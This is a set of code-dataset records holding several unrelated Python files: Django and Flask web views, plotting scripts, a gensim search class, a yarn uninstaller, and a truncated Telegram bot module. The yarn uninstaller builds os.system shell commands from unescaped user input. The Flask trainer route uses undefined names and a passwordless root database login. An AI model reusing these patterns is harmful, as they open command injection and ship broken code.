return render(request, \"biblio/csv.html\", {\"result\": True, 'books': books_list})\n else:\n form = UploadFileForm()\n return render(request, 'biblio/csv2.html', {'form': form})\n \n\ndef api_search(request):\n\n url = 'https://www.googleapis.com/books/v1/volumes?'\n\n if request.method == 'POST':\n form = SearchBookForm(request.POST)\n\n if form.is_valid():\n result = form.cleaned_data['title']\n params = dict(q=result)\n\n resp = requests.get(url=url, params=params)\n data = resp.json()\n # book_data = data['items'][0]['volumeInfo']\n # title = book_data['title']\n # authors = \n return render(request, 'biblio/api_search.html', {'form':form, 'data':data})\n\n else:\n form = SearchBookForm()\n return render(request, 'biblio/api_search.html', {'form': form})\n\n ", "sub_path": "biblio/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3453, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "models.Book.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 12, "usage_type": 
"attribute"}, {"api_name": "models.Book", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Book", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Auteur.objects.all", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Auteur.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Auteur", "line_number": 21, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Auteur", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Genre.objects.all", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Genre.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Genre", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Genre", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Edition.objects.all", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Edition.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Edition", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Edition", "line_number": 41, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "form.UploadFileForm", "line_number": 53, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 55, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 59, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 63, "usage_type": "call"}, {"api_name": "models.Edition.objects.create", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Edition.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.Edition", "line_number": 65, "usage_type": "name"}, {"api_name": "models.Genre.objects.create", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Genre.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Genre", "line_number": 66, "usage_type": "name"}, {"api_name": "models.Auteur.objects.create", "line_number": 67, "usage_type": "call"}, {"api_name": "models.Auteur.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.Auteur", "line_number": 67, "usage_type": "name"}, {"api_name": "models.Book.objects.create", "line_number": 69, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 69, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": 
"call"}, {"api_name": "form.UploadFileForm", "line_number": 78, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 79, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 49, "usage_type": "call"}, {"api_name": "form.SearchBookForm", "line_number": 87, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 89, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 90, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 98, "usage_type": "call"}, {"api_name": "form.SearchBookForm", "line_number": 101, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "276041763", "text": "from plotly import express as px\n\nfig = px.scatter(\n x=lons,\n y=lats,\n labels={'x': '经度', 'y': '纬度'},\n range_x=[-200, 200],\n range_y=[-90, 90],\n width=800,\n height=800,\n title='全球地震散点图',\n)\nfig.write_html('global_earthquakes.html')\nfig.show()", "sub_path": "Python Work/Exercise/visualization project/eq_world_map.py", "file_name": "eq_world_map.py", "file_ext": "py", "file_size_in_byte": 287, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "plotly.express.scatter", "line_number": 3, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "209293786", "text": "# -*- coding: utf-8 -*-\n\nfrom clint.textui import puts, colored\nfrom PyInquirer import prompt\n\n\n\"\"\" Define windows package delete function for yarn \"\"\"\n\n\ndef package_manager_yarn(global_package, containerized_package):\n import os\n import click\n import re\n\n if global_package and not containerized_package:\n puts(colored.white(\n \"The list of available globally packages to uninstall are\"))\n print(\"\")\n os.system(\n 'cd extra/files/yarn && yarn global list > packages.txt')\n\n file = open('extra/files/yarn/packages.txt',\n 'r', encoding='utf-8')\n\n content = file.readlines()\n\n for line in content:\n click.echo_via_pager(line.strip())\n\n extra_questions = [\n {\n 'name': 'package_name',\n 'type': 'input',\n 'message': 'Enter package name for uninstallation |',\n 'default': 'foo'\n },\n {\n 'name': 'confirmation',\n 'type': 'confirm',\n 'message': 'Are you sure you wanna delete this package?',\n 'default': False,\n }\n ]\n\n answers = prompt(extra_questions)\n\n package_name = answers['package_name']\n confirmation = answers['confirmation']\n\n if confirmation:\n print(\"\")\n os.system('yarn global remove {}'.format(package_name))\n puts(\n f'\\n{colored.yellow(\"Uninstalled package {}\".format(package_name))}')\n quit()\n elif not confirmation:\n puts(\n f'\\n{colored.green(\"Thank God you decided not to uninstall the package {}!\".format(package_name))}')\n quit()\n\n elif containerized_package and not global_package:\n puts('\\nUsing normal yarn package environments\\n')\n\n more_question = [\n {\n 'name': 'folder_location',\n 'type': 'input',\n 'message': 'Enter full path of folder containing project using yarn |'\n }\n ]\n\n answer = prompt(more_question)\n folder_path = answer['folder_location']\n\n if folder_path != \"\":\n drive_pattern = re.compile('[A-Z]\\\\:')\n is_a_drive = re.search(drive_pattern, folder_path)\n drive_letter = folder_path.split(':')[0]\n changed_drive = os.chdir(f'{drive_letter}:')\n main_folder = 
folder_path.split(':')[1]\n correct_folder = os.path.exists(f'{main_folder}/yarn.lock')\n\n if not correct_folder:\n print(\"\")\n puts(colored.red(\n 'Sorry an error occurred with verifying if folder is an actual yarn project'))\n exit()\n elif correct_folder:\n print(\"\")\n activated = os.system(\n 'cd \"{}\" && mkdir info && cd info && type nul > packages.txt && yarn list > packages.txt'.format(folder_path))\n\n with open('{}/info/packages.txt'.format(folder_path)) as package_file:\n content = package_file.readlines()\n for line in content:\n click.echo_via_pager(line)\n\n if activated == 1:\n puts(\n f\"{colored.red('Error')}: while listing dependencies in the yarn project\")\n exit()\n\n extra_questions = [\n {\n 'name': 'package_name',\n 'type': 'input',\n 'message': 'Enter package name for uninstallation |',\n 'default': 'foo'\n },\n {\n 'name': 'confirmation',\n 'type': 'confirm',\n 'message': 'Are you sure you wanna delete this package?',\n 'default': False,\n }\n ]\n\n answers = prompt(extra_questions)\n package_name = answers['package_name']\n confirmation = answers['confirmation']\n\n if confirmation:\n activated = os.system(\n 'cd \"{}\" && yarn remove {}'.format(folder_path, package_name))\n\n if activated == 0:\n puts(\n f'\\n{colored.yellow(\"Uninstalled package {}\".format(package_name))}')\n elif activated == 1:\n puts(\n f\"{colored.red('Error')}: while deleting dependencies in the yarn project\")\n quit()\n elif not confirmation:\n puts(\n f'\\n{colored.green(\"Thank God you decided not to uninstall the package {}!\".format(package_name))}')\n quit()\n\n\n\"\"\"\nIf you wanna contribute whats really needed is what is in written as a --> `TODO`\nI love folding code\n\"\"\"\n", "sub_path": "package_uninstaller/package_managers/windows/yarn.py", "file_name": "yarn.py", "file_ext": "py", "file_size_in_byte": 5024, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "clint.textui.puts", "line_number": 16, "usage_type": "call"}, {"api_name": "clint.textui.colored.white", "line_number": 16, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 16, "usage_type": "name"}, {"api_name": "os.system", "line_number": 19, "usage_type": "call"}, {"api_name": "click.echo_via_pager", "line_number": 28, "usage_type": "call"}, {"api_name": "PyInquirer.prompt", "line_number": 45, "usage_type": "call"}, {"api_name": "os.system", "line_number": 52, "usage_type": "call"}, {"api_name": "clint.textui.puts", "line_number": 53, "usage_type": "call"}, {"api_name": "clint.textui.colored.yellow", "line_number": 54, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 54, "usage_type": "name"}, {"api_name": "clint.textui.puts", "line_number": 57, "usage_type": "call"}, {"api_name": "clint.textui.colored.green", "line_number": 58, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 58, "usage_type": "name"}, {"api_name": "clint.textui.puts", "line_number": 62, "usage_type": "call"}, {"api_name": "PyInquirer.prompt", "line_number": 72, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 76, "usage_type": "call"}, {"api_name": "re.search", "line_number": 77, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "clint.textui.puts", "line_number": 85, "usage_type": 
"call"}, {"api_name": "clint.textui.colored.red", "line_number": 85, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 85, "usage_type": "name"}, {"api_name": "os.system", "line_number": 90, "usage_type": "call"}, {"api_name": "click.echo_via_pager", "line_number": 96, "usage_type": "call"}, {"api_name": "clint.textui.puts", "line_number": 99, "usage_type": "call"}, {"api_name": "clint.textui.colored.red", "line_number": 100, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 100, "usage_type": "name"}, {"api_name": "PyInquirer.prompt", "line_number": 118, "usage_type": "call"}, {"api_name": "os.system", "line_number": 123, "usage_type": "call"}, {"api_name": "clint.textui.puts", "line_number": 127, "usage_type": "call"}, {"api_name": "clint.textui.colored.yellow", "line_number": 128, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 128, "usage_type": "name"}, {"api_name": "clint.textui.puts", "line_number": 130, "usage_type": "call"}, {"api_name": "clint.textui.colored.red", "line_number": 131, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 131, "usage_type": "name"}, {"api_name": "clint.textui.puts", "line_number": 134, "usage_type": "call"}, {"api_name": "clint.textui.colored.green", "line_number": 135, "usage_type": "call"}, {"api_name": "clint.textui.colored", "line_number": 135, "usage_type": "name"}]} +{"seq_id": "387174063", "text": "from flask import Flask, render_template, request\nfrom networkx import disjoint_union\n\nfrom .graph_ops import GraphDB\n\ndef create_app():\n app = Flask(__name__)\n graph_database = GraphDB(\"data/out.txt.gz\", \"data/entity_full_names.txt\", predictions_filename=\"data/hypotheses_confidence.txt.gz\")\n\n @app.route(\"/\")\n def get_form_info():\n \"\"\"Renders the main page, and populates the menus with nodes from the database.\"\"\"\n gene_list = sorted(graph_database.get_nodes(\"gene\"))\n ab_list = sorted(graph_database.get_nodes(\"antibiotic\"))\n full_node_list = sorted(graph_database.get_nodes())\n\n return render_template(\"ecomics_index.html\", gene_list=gene_list, ab_list=ab_list, full_list=full_node_list)\n\n @app.route(\"/gene_search\", methods=[\"POST\", \"GET\"])\n def gene_search():\n \"\"\"Draws the neighborhood around a given gene\"\"\"\n\n selected_gene = request.args.get(\"gene\", default=None)\n\n if selected_gene is None:\n selected_gene = request.form[\"gene-select-box\"]\n\n gene_neighborhood_graph = graph_database.get_node_neighborhood(selected_gene, 2)\n\n gene_neighborhood_graph_cy = graph_database.get_graph_cytoscape_format(gene_neighborhood_graph)\n\n return render_template(\"ecomics_gene_search.html\", graph_data=gene_neighborhood_graph_cy, root_node=selected_gene)\n\n @app.route(\"/antibiotic_search\", methods=[\"POST\", \"GET\"])\n def antibiotic_search():\n \"\"\"Draws the neighborhood around a given antibiotic\"\"\"\n selected_ab = request.args.get(\"antibiotic\", default=None)\n\n if selected_ab is None:\n selected_ab = request.form[\"antibiotic-select-box\"]\n\n ab_neighborhood_graph = graph_database.get_node_neighborhood(selected_ab, 2)\n\n ab_neighborhood_graph_cy = graph_database.get_graph_cytoscape_format(ab_neighborhood_graph)\n\n return render_template(\"ecomics_antibiotic_search.html\", graph_data=ab_neighborhood_graph_cy, root_node=selected_ab)\n\n @app.route(\"/gene_antibiotic_path\", methods=[\"POST\"])\n def gene_antibiotic_path_search():\n \"\"\"Plots the union of thew neighborhoods of a given gene and 
antibiotic\"\"\"\n selected_gene = request.form[\"gene-select-box\"]\n selected_ab = request.form[\"antibiotic-select-box\"]\n\n graph_path = graph_database.get_path_between_nodes(selected_gene, selected_ab)\n\n graph_path_cy = graph_database.get_graph_cytoscape_format(graph_path)\n\n return render_template(\"ecomics_gene_antibiotic_path.html\", graph_data=graph_path_cy, root_node=selected_gene, root_node_2=selected_ab)\n\n return app\n\n\nif __name__ == \"__main__\":\n app = create_app()\n app.run()\n", "sub_path": "backendapp/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2678, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "graph_ops.GraphDB", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "165244615", "text": "import numpy as np\nimport pickle\nfrom os import path, getcwd, makedirs\n\nimport matplotlib.pyplot as plt\nfrom plotter_params import plot_setup\nfrom matplotlib.ticker import MaxNLocator\n\nfilename = path.join('data', 'BO', 'real_machine')\nreg_Fs = []\nexp_Fs = []\nfor i in range(1, 7):\n if i == 1:\n filepath = path.join(filename, '3q_CNOT_three_applications')\n else:\n filepath = path.join(filename, f'3q_CNOT_three_applications_{i}')\n with open(path.join(filepath, 'fidels.pickle'), 'rb') as f:\n regular_true_F, seen_true_F, exp_opt_true_F = pickle.load(f)\n print(regular_true_F)\n reg_Fs.append(regular_true_F)\n exp_Fs.append(exp_opt_true_F)\n\nif not path.exists(path.join(filename, 'plots')):\n makedirs(path.join(filename, 'plots'))\n\n_s = 10\nplot_setup()\nplt.scatter([i+1 for i in range(len(reg_Fs))], reg_Fs, marker='o', label='Unoptimised', s=_s)\nplt.scatter([i+1 for i in range(len(exp_Fs))], exp_Fs, marker='^', label='Optimised', s=_s)\nplt.ylim([0., 0.8])\nplt.xlabel('Optimisation Run')\nplt.ylabel('Process Fidelity')\nplt.legend(frameon=True)\nax = plt.gca()\nax.xaxis.set_major_locator(MaxNLocator(integer=True))\nax.margins(0.01)\nplt.savefig(path.join(filename, 'plots', 
'70_iterations_meas_err_simplified.pdf'))\nplt.show()\n", "sub_path": "plot_3_application_CNOT_BO.py", "file_name": "plot_3_application_CNOT_BO.py", "file_ext": "py", "file_size_in_byte": 1270, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "name"}, {"api_name": "plotter_params.plot_setup", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "15991830", "text": "from flask import Flask, request, jsonify\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import environ\nfrom flask_cors import CORS\napp = Flask(__name__)\n\n# app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL')\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root@localhost:3306/spm'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ENGINE_OPTIONS'] = {'pool_recycle': 299}\n\ndb = 
SQLAlchemy(app)\nCORS(app)\n\nclass Trainer(db.Model):\n __tablename__ = 'trainer'\n\n TrainerID = db.Column(db.Integer, nullable=False, primary_key=True)\n EmployeeName = db.Column(db.String(255), nullable=False)\n CurrentDesignation = db.Column(db.String(255), nullable=False)\n Department = db.Column(db.String(255), nullable=False)\n\n def __init__(self, TrainerID, EmployeeName, CurrentDesignation, Department):\n self.TrainerID = TrainerID\n self.EmployeeName = EmployeeName\n self.CurrentDesignation = CurrentDesignation\n self.Department = Department\n\n def json(self):\n return {\"TrainerID\": self.TrainerID, \"EmployeeName\": self.EmployeeName, \n \"CurrentDesignation\": self.CurrentDesignation, \"Department\": self.Department}\n\n@app.route(\"/trainer\")\ndef get_all():\n trainerlist = Trainer.query.all()\n if len(trainerlist):\n return jsonify(\n {\n \"code\": 200,\n \"data\": {\n \"classes\": [trainer.json() for trainer in trainerlist]\n }\n }\n )\n return jsonify(\n {\n \"code\": 404,\n \"message\": \"No trainers found.\"\n }\n ), 404\n\n@app.route(\"/trainer/<TrainerID>\")\ndef find_by_trainer(TrainerID):\n trainer = Trainer.query.filter_by(TrainerID=TrainerID).first()\n if trainer:\n return jsonify(\n {\n \"code\": 200,\n \"data\": trainer.json()\n }\n ), 200\n return jsonify(\n {\n \"code\": 404,\n \"message\": \"No trainer found.\"\n }\n ), 404\n\n# dk abt this part need edit\n@app.route(\"/user/\", methods=['POST'])\ndef create_class(classname):\n if (Classes.query.filter_by(ClassID=ClassID).first()):\n return jsonify(\n {\n \"code\": 400,\n \"data\": {\n \"email\": email\n },\n \"message\": \"Email already exists.\"\n }\n ), 400\n\n data = request.get_json()\n user = User(email, **data)\n\n try:\n db.session.add(user)\n db.session.commit()\n except:\n return jsonify(\n {\n \"code\": 500,\n \"data\": {\n \"user\": user.json()\n },\n \"message\": \"An error occurred creating the user.\"\n }\n ), 500\n\n return jsonify(\n {\n \"code\": 201,\n \"data\": user.json()\n }\n ), 201\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)", "sub_path": "spm website/docker/trainer.py", "file_name": "trainer.py", "file_ext": "py", "file_size_in_byte": 3023, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "150839109", "text": "import json\nimport re\nfrom collections import Counter\nfrom typing import Dict, List, Tuple\n\nimport pandas as pd\nfrom gensim import similarities\n\nfrom . 
import Chapter, DatabaseConnection, Paragraph, RequestHandler\nfrom .utils import _build_corpus, _build_lsi_model, nlp\n\nHOST = \"db\"\nALLOWED_METADATA = [\"title\", \"author\", \"release date\", \"last updated\", \"language\"]\n\n\nclass Document:\n def __init__(self, text: str, num_topics: int = 100):\n self._get_metadata(text)\n self.chapters = self._get_chapters(text)\n\n # build a gensim dictionary of words\n dictionary, corpus = _build_corpus(self.paragraphs)\n self.dictionary = dictionary\n self.corpus = corpus\n # build the lsi model\n self.model = _build_lsi_model(dictionary, corpus, num_topics)\n\n # connect to db\n self.db = DatabaseConnection(host=HOST)\n self.rq = RequestHandler()\n\n def _get_metadata(self, text: str) -> None:\n \"\"\" Extract relevant metadata fields\n\n \"\"\"\n metadata = re.findall(\"(.*): (.*)\\n\", text)\n for match in metadata:\n if match[0].lower() in ALLOWED_METADATA:\n setattr(self, match[0].replace(\" \", \"_\").lower(), match[1])\n\n def _get_chapters(self, text: str) -> List[Chapter]:\n \"\"\" Split prose into chapters\n\n \"\"\"\n # remove end\n prose = re.split(\"End of Project Gutenberg\", text)\n # split up chapters\n chapters = re.split(r\"chapter \\w+.?\", prose[0], flags=re.IGNORECASE)\n chapters = [Chapter(chapter) for chapter in chapters[1:]]\n return chapters\n\n @property\n def text(self) -> str:\n return \"\\n\\n\".join(c.text for c in self.chapters)\n\n @property\n def paragraphs(self) -> List[Paragraph]:\n paragraphs = [p for c in self.chapters for p in c.paragraphs]\n return paragraphs\n\n def _get_coords(self, location: str) -> Tuple[float, float, str, str]:\n \"\"\" Get coords of a specified location\n\n - check in db\n - ping openstreetmap API\n\n :param str location: location to get\n :return numeric, numeric, str, str: lon, lat, location_class, location_type\n \"\"\"\n if location in self.db.get_locations():\n lon, lat, location_class, location_type = self.db.get_location(location)[1:]\n elif location not in self.db.get_unknown_locations():\n # ping open street api\n lon, lat, location_class, location_type = self.rq.get_location_info(\n location\n )\n # add information to db\n self.db.add_location((location, lon, lat, location_class, location_type))\n else:\n raise ValueError(f\"WARNING: {location} could not be found\")\n return float(lon), float(lat), location_class, location_type\n\n def get_locations(self) -> List[Dict]:\n \"\"\" Get all locations mentioned in the document\n\n :return list(dict):\n \"\"\"\n locations = [\n (loc, para.mentions_fogg)\n for para in self.paragraphs\n for loc in para.locations\n ]\n\n location_info = []\n for loc, count in Counter(locations).items():\n try:\n lon, lat, location_class, location_type = self._get_coords(loc[0])\n except IndexError:\n self.db.add_unknown_location(loc[0])\n print(\n f\"WARNING: {loc[0]} could not be found. 
Added to unknown locations.\"\n )\n continue\n except ValueError as err:\n print(str(err))\n continue\n location_info.append(\n {\n \"location\": loc[0],\n \"count\": count,\n \"lon\": lon,\n \"lat\": lat,\n \"class\": location_class,\n \"type\": location_type,\n \"has_fogg\": loc[1],\n }\n )\n # remove uncommon or unwanted locations\n filter_locations = self.db.get_filter_locations()\n return [l for l in location_info if l[\"location\"] in filter_locations]\n\n def search_paragraphs(self, phrase: str) -> Tuple[str, float]:\n \"\"\" Query the document to pull out the most similar paragraph to some input text\n\n :param str phrase: Text to query paragraphs against\n \"\"\"\n phrase = [\n w.lemma_\n for w in nlp(phrase)\n if not (w.is_space or w.is_punct or w.is_digit or w.is_stop)\n ]\n print(phrase)\n # convert the query to LSI space\n vec_bow = self.dictionary.doc2bow(phrase)\n vec_lsi = self.model[vec_bow]\n # index against the corpus for comparison\n index = similarities.MatrixSimilarity(self.model[self.corpus])\n # perform a similarity query against the corpus\n sims = index[vec_lsi]\n sims = sorted(enumerate(sims), key=lambda item: -item[1])\n if sims[0][1] < 0.01:\n return \"\", 0\n else:\n return self.paragraphs[sims[0][0]].text.text, sims[0][1]\n", "sub_path": "src/document.py", "file_name": "document.py", "file_ext": "py", "file_size_in_byte": 5105, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils._build_corpus", "line_number": 22, "usage_type": "call"}, {"api_name": "utils._build_lsi_model", "line_number": 26, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 36, "usage_type": "call"}, {"api_name": "re.split", "line_number": 46, "usage_type": "call"}, {"api_name": "re.split", "line_number": 48, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 48, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 61, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 95, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.nlp", "line_number": 129, "usage_type": "call"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 137, "usage_type": "call"}, {"api_name": "gensim.similarities", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "237703153", "text": "\"\"\"\nУдаляет старые сообщения, ttl зависит от содержимого:\nобъявления живут дольше, а опасные удаляются почти сразу.\n\nКак работает:\n* При запуске читает список сохраненных сообщений\n* !save с ответом на сообщение -> сохранить\n* При запуске проверяем все старые сообщения\n* При поступлении нового сообщения ставим таймер\n\"\"\"\nimport re\nimport asyncio\nimport time\n\nfrom datetime import datetime, timezone\nfrom telethon import events, functions\nfrom .client import client\nfrom .config import channel_id, chat_id, do_forward_messages\nfrom .ban_hammer import banlist\nfrom .persistent import to_delete\n\nsecond = 1\nminute = 60 * second\nhour = 60 * minute\nday = 24 * hour\n\n\ndef get_message_ttl(text):\n text_lowercase = text.lower()\n\n # /команды\n if text.startswith('/'):\n return minute\n\n # Объявления\n 
